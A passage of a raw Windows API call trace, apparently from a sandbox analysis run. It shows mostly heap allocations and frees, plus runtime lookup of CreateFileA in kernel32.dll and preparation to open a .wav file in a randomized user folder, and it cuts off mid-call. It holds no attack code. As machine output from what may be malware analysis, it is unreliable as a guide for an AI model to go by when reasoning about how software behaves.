lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.755] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0038.755] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.755] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0038.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0038.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.755] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3f8 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0038.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c730 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0038.756] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0038.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0038.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0038.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0038.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0038.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0038.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.759] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.761] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0038.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889628 [0038.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889628, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0038.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.761] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0038.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889628 [0038.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889628, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0038.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.762] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0038.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0038.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0038.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav", cchWideChar=64, lpMultiByteStr=0x7ab260, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav", lpUsedDefaultChar=0x0) returned 64 [0038.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.763] CreateFileA 